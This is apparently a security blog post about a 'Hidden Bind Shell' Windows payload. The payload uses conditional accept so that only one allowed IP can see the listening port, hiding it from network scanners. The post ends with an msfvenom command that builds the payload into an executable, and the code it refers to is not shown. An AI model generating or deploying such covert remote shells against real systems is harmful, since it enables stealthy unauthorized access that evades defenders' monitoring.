Many organizations use tools like Nexpose
to perform periodic scans of their networks and to look for new/unidentified open ports. In this kind of environment it’s difficult that our bindshell goes unnotice. For this reason, after finishing the ACL Bind Shellcode
it occurred to me that the payload could be further improved so that it was only visible to the IP I wanted. The result is another alternative to the ACL Bind Shell called “Hidden Bind Shell
“. The payload will also be a modified version of the Stephen Fewer shell_bind_tcp.
The idea is that our shellcode responds with a RST to any connection attempt coming from an IP different than the one we set in the shellcode (defined by the variable AHOST, allowed Host). This is a good way to keep the shellcode hidden from scanning tools since our socket will appear as “CLOSED” (in Windows XP you won’t even see anything locally from the netstat output).
To achieve this without implementing raw sockets I have used the setsockopt
API setting the SO_CONDITIONAL_ACCEPT
option to true. With this configuration whenever someone tries to establish a new connection, the TCP stack will not respond with a SYN-ACK
(as it does by default) but its management is delegated to the shellcode itself which will decide, based on the source IP address, whether accept or not the connection. This condition can be defined by the conditional accept callback registered with WSAAccep
The code in charge of applying this functionality, in this first version, is shown below:
Its use will be exactly the same as the ACL Bind Shell. We will use the AHOST variable to specify the IP that will have visibility to the shellcode. For example, to make the shellcode accessible only from the IP 192.168.1.200 we would run msfvenom as follows:
root@fzuckerman:~#msfvenom -p windows/shell_hidden_bind_tcp LPORT=54321 AHOST=192.168.1.200 -f exe > hidden_shell.exe